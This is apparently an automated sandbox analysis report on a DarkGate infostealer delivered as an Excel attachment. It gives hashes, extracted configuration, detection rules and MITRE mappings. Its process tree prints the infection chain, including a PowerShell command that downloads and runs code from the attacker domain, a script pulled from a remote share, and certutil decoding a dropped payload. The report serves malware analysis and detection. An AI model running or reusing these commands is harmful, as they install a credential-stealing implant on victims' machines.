darkgate | efe211f79e3fefb5368e5e9379441cf800c5872f37f644fbf7768d5f36aee5f0

Analysis

max time kernel
84s
max time network
89s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
18-03-2024 17:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

attach#6335-18-03-2024.xlsx
Size

57KB
MD5

44f811ec16a3d53c0a824c79db4d9045
SHA1

2fb92d7ec2139b1197166318efeebeb0ec668928
SHA256

69a2cc590e745c9f2db24479fe9ce39cf1832d3ae19035cd410d820bbfa81604
SHA512

c87d1d86b370e28f0b22ee513ad9b55b30dae48bc36aa81a2fa2c002a5871bf5659e3883741a461e6954fbc764395150221b61481f8443e1818a945ba4218eec
SSDEEP

768:bnrZ932qpaOKFSGOJdGvoZCPAUJ1YxBardD2TSWGdCIKD13zegYN1T/plx:5J2u4OPKIxoEuDKNzexTRlx

Score

10^/10

darkgate admin8888 stealer

Malware Config

Extracted

Family

darkgate

Botnet

admin8888

buassinnndm.net

Attributes

anti_analysis
true
anti_debug
false
anti_vm
true
c2_port
80
check_disk
false
check_ram
false
check_xeon
false
crypter_au3
false
crypter_dll
false
crypter_raw_stub
false
internal_mutex
losBHUAX
minimum_disk
100
minimum_ram
4096
ping_interval
6
rootkit
false
startup_persistence
true
username
admin8888

Signatures

DarkGate
DarkGate is an infostealer written in C++.
stealer darkgate

Detect DarkGate stealer 4 IoCs

resource	yara_rule
behavioral1/memory/2392-75-0x0000000004AB0000-0x0000000004B23000-memory.dmp	family_darkgate_v6
behavioral1/memory/2392-92-0x0000000004AB0000-0x0000000004B23000-memory.dmp	family_darkgate_v6
behavioral1/memory/4008-123-0x0000000004700000-0x0000000004773000-memory.dmp	family_darkgate_v6
behavioral1/memory/4008-125-0x0000000004700000-0x0000000004773000-memory.dmp	family_darkgate_v6

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2152	4356	WScript.exe	83
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4608	4356	WScript.exe	83

Blocklisted process makes network request 8 IoCs

flow	pid	Process
74	4592	powershell.exe
77	4592	powershell.exe
100	4592	powershell.exe
109	4592	powershell.exe
124	2476	powershell.exe
127	2476	powershell.exe
130	2476	powershell.exe
131	2476	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	WScript.exe

Deletes itself 1 IoCs

pid	Process
4356	EXCEL.EXE

Executes dropped EXE 2 IoCs

pid	Process
2392	AutoHotkey.exe
4008	AutoHotkey.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoHotkey.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoHotkey.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoHotkey.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoHotkey.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Temp\5B285E00\:Zone.Identifier:$DATA	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4356	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4592	powershell.exe
4592	powershell.exe
4592	powershell.exe
2476	powershell.exe
2476	powershell.exe
2476	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4592	powershell.exe
Token: SeDebugPrivilege	2476	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
4356	EXCEL.EXE
4356	EXCEL.EXE

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
4356	EXCEL.EXE
4356	EXCEL.EXE
4356	EXCEL.EXE
4356	EXCEL.EXE
4356	EXCEL.EXE
4356	EXCEL.EXE
4356	EXCEL.EXE
4356	EXCEL.EXE
4356	EXCEL.EXE
4356	EXCEL.EXE
4356	EXCEL.EXE
4356	EXCEL.EXE

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 4356 wrote to memory of 2152	4356	EXCEL.EXE	101
PID 4356 wrote to memory of 2152	4356	EXCEL.EXE	101
PID 2152 wrote to memory of 4592	2152	WScript.exe	103
PID 2152 wrote to memory of 4592	2152	WScript.exe	103
PID 4592 wrote to memory of 3732	4592	powershell.exe	108
PID 4592 wrote to memory of 3732	4592	powershell.exe	108
PID 4356 wrote to memory of 4608	4356	EXCEL.EXE	111
PID 4356 wrote to memory of 4608	4356	EXCEL.EXE	111
PID 4608 wrote to memory of 2476	4608	WScript.exe	112
PID 4608 wrote to memory of 2476	4608	WScript.exe	112
PID 4592 wrote to memory of 2392	4592	powershell.exe	114
PID 4592 wrote to memory of 2392	4592	powershell.exe	114
PID 4592 wrote to memory of 2392	4592	powershell.exe	114
PID 4592 wrote to memory of 3104	4592	powershell.exe	115
PID 4592 wrote to memory of 3104	4592	powershell.exe	115
PID 2476 wrote to memory of 1604	2476	powershell.exe	116
PID 2476 wrote to memory of 1604	2476	powershell.exe	116
PID 2476 wrote to memory of 4008	2476	powershell.exe	118
PID 2476 wrote to memory of 4008	2476	powershell.exe	118
PID 2476 wrote to memory of 4008	2476	powershell.exe	118
PID 2476 wrote to memory of 540	2476	powershell.exe	119
PID 2476 wrote to memory of 540	2476	powershell.exe	119

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3104	attrib.exe
540	attrib.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\attach#6335-18-03-2024.xlsx"
1⤵
- Deletes itself
- Checks processor information in registry
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4356
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "\\passiovinum.com\share\EXCEL_DOCUMENT_OPEN.vbs"
  2⤵
  - Process spawned unexpected child process
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2152
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'buassinnndm.net/czeeyrlr')
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4592
  - - C:\Windows\system32\certutil.exe
      "C:\Windows\system32\certutil.exe" -decodehex a.bin AutoHotkey.exe
      4⤵
      PID:3732
  - - C:\gmli\AutoHotkey.exe
      "C:\gmli\AutoHotkey.exe" script.ahk
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      PID:2392
  - - C:\Windows\system32\attrib.exe
      "C:\Windows\system32\attrib.exe" +h C:/gmli
      4⤵
      Views/modifies file attributes
      PID:3104
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "\\passiovinum.com\share\EXCEL_DOCUMENT_OPEN.vbs"
  2⤵
  - Process spawned unexpected child process
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:4608
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'buassinnndm.net/czeeyrlr')
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2476
  - - C:\Windows\system32\certutil.exe
      "C:\Windows\system32\certutil.exe" -decodehex a.bin AutoHotkey.exe
      4⤵
      PID:1604
  - - C:\gmli\AutoHotkey.exe
      "C:\gmli\AutoHotkey.exe" script.ahk
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      PID:4008
  - - C:\Windows\system32\attrib.exe
      "C:\Windows\system32\attrib.exe" +h C:/gmli
      4⤵
      Views/modifies file attributes
      PID:540

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
56c43715e0e7fa58012d8a5769d8d568

SHA1
4370ca3436f2e3a95b47a728503a2c22a5a5fa39

SHA256
8ef51b68725d9ddcda70f9f7ef24686ff3cb4a00f7d2dce79d10027ed63dfed5

SHA512
b8da8defb2080d04babc3e676cc9686c7f71b15eeca0e738ca75c9fb7af968eba8d3daff5bc2e31d471e26568df2f319ec1f4b00bf43ffb60460e5df787947ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ec3435c9e543fe59402b0a9c3e33c71b

SHA1
1f0ca923c1508118699d9a3e9efb492e76008175

SHA256
1060e6728cd7e3d02cff59a1d0a524ee1af3f666d044fad871cbdd5a4ce29d99

SHA512
8789c79186e7c2ace02f08cbf93cfd1184497d195b4841d6b2485c3d238b206643617ac8ad803e7dc58362b0c002ee842ba607742c5bc4e43104b67d2d8b09c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\5B285E00

Filesize
57KB

MD5
0a099bce582e7b24b401ab8780176a03

SHA1
12eb8552ad7ea12412638f1a9d8766e3599be8be

SHA256
54a1100ae9642481432c4069322a1315e642a3da4045ec449dd6b2e8bc52e50f

SHA512
40df5a480112326dd2845b4100b2acb69089d4e69f51ddfe56bef17962ad3eb5526dfc83130923b96399fae1aebd209c4fe9750511fa6c7a8de5b9aa6cd0bd88

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dnhtau0e.cfl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\DEKdccK

Filesize
32B

MD5
d81763ce24cef944c46c6a600a706d62

SHA1
a2b57f808a783b7df169e11d6c504bb4a524841f

SHA256
5404e783b8bfe8110610b38a2c8d055b539eecf879128e5bc91f924372408cdd

SHA512
b88d5b4494917d8930fa2b9d6a620dec440fe1873c8b742188344dfc231b5005ed8e84e34ac9dc0e32502745ae4933ff2bdd7d7894eb6bf905d75c7964c74699

Download Submit
C:\gmli\AutoHotkey.exe

Filesize
892KB

MD5
a59a2d3e5dda7aca6ec879263aa42fd3

SHA1
312d496ec90eb30d5319307d47bfef602b6b8c6c

SHA256
897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb

SHA512
852972ca4d7f9141ea56d3498388c61610492d36ea7d7af1b36d192d7e04dd6d9bc5830e0dcb0a5f8f55350d4d8aaac2869477686b03f998affbac6321a22030

Download Submit
C:\gmli\a.bin

Filesize
1.7MB

MD5
bf88d228baec74c7928df463db0f0fdc

SHA1
efe1657bb9a9a31742b71d8c14bae89b2ab5533b

SHA256
493099b55ea0da872d3b9855c5a60752833e737be547ebc5328caea2bf0542ed

SHA512
c247a0dbba9971a8949729f888a4d8b10ca188b6fabedb9d1fe9cc7907cc4d807e66f3367ca287bf1e4062c342cbb7a724a9cc168018f55bc187e04897c8bdfa

Download Submit
C:\gmli\script.ahk

Filesize
55KB

MD5
9c6bb4feab124eeccae3ca041f92d564

SHA1
aa6561a02998433f9b8d482472b08e1b722650e9

SHA256
b75ba5c4e74ee9ce20212aa53f750e0c4c1247cefa56fc4e523c5669fa236d6d

SHA512
b9420e83575592c6d86ad9dadf5e6ee180f67d78b80a53ef5727ca7e5c1a8af992d029fe3cfcdc9e9fdc67a651a610ba5f19429832722b43e4c43bb3a5552839

Download Submit
C:\gmli\test.txt

Filesize
913KB

MD5
f38ae69043104f8e253d61a925ca76e7

SHA1
6388de7d19464143e63db2ad516e319094462921

SHA256
3daf78657886d9192ce3fd15dfad995b8be9b64199976989109a0a462068a602

SHA512
13ced819bd92f87533b20d9ccdf974ea52b716c462113abdbaf89f2ed7d420fcf4b89fd3585f93d7fdffdb28cea2d5f4db197105b6b55a55f8b5a6ad4ad2608b

Download Submit
memory/2392-92-0x0000000004AB0000-0x0000000004B23000-memory.dmp

Filesize
460KB

Download
memory/2392-75-0x0000000004AB0000-0x0000000004B23000-memory.dmp

Filesize
460KB

Download
memory/2476-121-0x00007FFD17700000-0x00007FFD181C1000-memory.dmp

Filesize
10.8MB

Download
memory/2476-63-0x00007FFD17700000-0x00007FFD181C1000-memory.dmp

Filesize
10.8MB

Download
memory/2476-64-0x000001D6EFF30000-0x000001D6EFF40000-memory.dmp

Filesize
64KB

Download
memory/2476-65-0x000001D6EFF30000-0x000001D6EFF40000-memory.dmp

Filesize
64KB

Download
memory/4008-123-0x0000000004700000-0x0000000004773000-memory.dmp

Filesize
460KB

Download
memory/4008-125-0x0000000004700000-0x0000000004773000-memory.dmp

Filesize
460KB

Download
memory/4356-13-0x00007FFD41910000-0x00007FFD41B05000-memory.dmp

Filesize
2.0MB

Download
memory/4356-109-0x00007FFD01990000-0x00007FFD019A0000-memory.dmp

Filesize
64KB

Download
memory/4356-31-0x00007FFD41910000-0x00007FFD41B05000-memory.dmp

Filesize
2.0MB

Download
memory/4356-32-0x00007FFD41910000-0x00007FFD41B05000-memory.dmp

Filesize
2.0MB

Download
memory/4356-1-0x00007FFD41910000-0x00007FFD41B05000-memory.dmp

Filesize
2.0MB

Download
memory/4356-17-0x00007FFD41910000-0x00007FFD41B05000-memory.dmp

Filesize
2.0MB

Download
memory/4356-3-0x00007FFD41910000-0x00007FFD41B05000-memory.dmp

Filesize
2.0MB

Download
memory/4356-5-0x00007FFD41910000-0x00007FFD41B05000-memory.dmp

Filesize
2.0MB

Download
memory/4356-4-0x00007FFD01990000-0x00007FFD019A0000-memory.dmp

Filesize
64KB

Download
memory/4356-7-0x00007FFD01990000-0x00007FFD019A0000-memory.dmp

Filesize
64KB

Download
memory/4356-6-0x00007FFD41910000-0x00007FFD41B05000-memory.dmp

Filesize
2.0MB

Download
memory/4356-16-0x00007FFCFF030000-0x00007FFCFF040000-memory.dmp

Filesize
64KB

Download
memory/4356-113-0x00007FFD41910000-0x00007FFD41B05000-memory.dmp

Filesize
2.0MB

Download
memory/4356-15-0x00007FFCFF030000-0x00007FFCFF040000-memory.dmp

Filesize
64KB

Download
memory/4356-14-0x00007FFD41910000-0x00007FFD41B05000-memory.dmp

Filesize
2.0MB

Download
memory/4356-111-0x00007FFD01990000-0x00007FFD019A0000-memory.dmp

Filesize
64KB

Download
memory/4356-0-0x00007FFD01990000-0x00007FFD019A0000-memory.dmp

Filesize
64KB

Download
memory/4356-2-0x00007FFD01990000-0x00007FFD019A0000-memory.dmp

Filesize
64KB

Download
memory/4356-12-0x00007FFD41910000-0x00007FFD41B05000-memory.dmp

Filesize
2.0MB

Download
memory/4356-11-0x00007FFD41910000-0x00007FFD41B05000-memory.dmp

Filesize
2.0MB

Download
memory/4356-112-0x00007FFD41910000-0x00007FFD41B05000-memory.dmp

Filesize
2.0MB

Download
memory/4356-10-0x00007FFD01990000-0x00007FFD019A0000-memory.dmp

Filesize
64KB

Download
memory/4356-9-0x00007FFD41910000-0x00007FFD41B05000-memory.dmp

Filesize
2.0MB

Download
memory/4356-8-0x00007FFD41910000-0x00007FFD41B05000-memory.dmp

Filesize
2.0MB

Download
memory/4356-108-0x00007FFD01990000-0x00007FFD019A0000-memory.dmp

Filesize
64KB

Download
memory/4356-18-0x00007FFD41910000-0x00007FFD41B05000-memory.dmp

Filesize
2.0MB

Download
memory/4356-110-0x00007FFD01990000-0x00007FFD019A0000-memory.dmp

Filesize
64KB

Download
memory/4592-74-0x00007FFD17700000-0x00007FFD181C1000-memory.dmp

Filesize
10.8MB

Download
memory/4592-66-0x000001F44A1C0000-0x000001F44A1D0000-memory.dmp

Filesize
64KB

Download
memory/4592-62-0x00007FFD17700000-0x00007FFD181C1000-memory.dmp

Filesize
10.8MB

Download
memory/4592-47-0x000001F44A920000-0x000001F44AAE2000-memory.dmp

Filesize
1.8MB

Download
memory/4592-46-0x000001F44A1C0000-0x000001F44A1D0000-memory.dmp

Filesize
64KB

Download
memory/4592-45-0x000001F44A1C0000-0x000001F44A1D0000-memory.dmp

Filesize
64KB

Download
memory/4592-44-0x000001F44A1C0000-0x000001F44A1D0000-memory.dmp

Filesize
64KB

Download
memory/4592-43-0x00007FFD17700000-0x00007FFD181C1000-memory.dmp

Filesize
10.8MB

Download
memory/4592-33-0x000001F431F00000-0x000001F431F22000-memory.dmp

Filesize
136KB

Download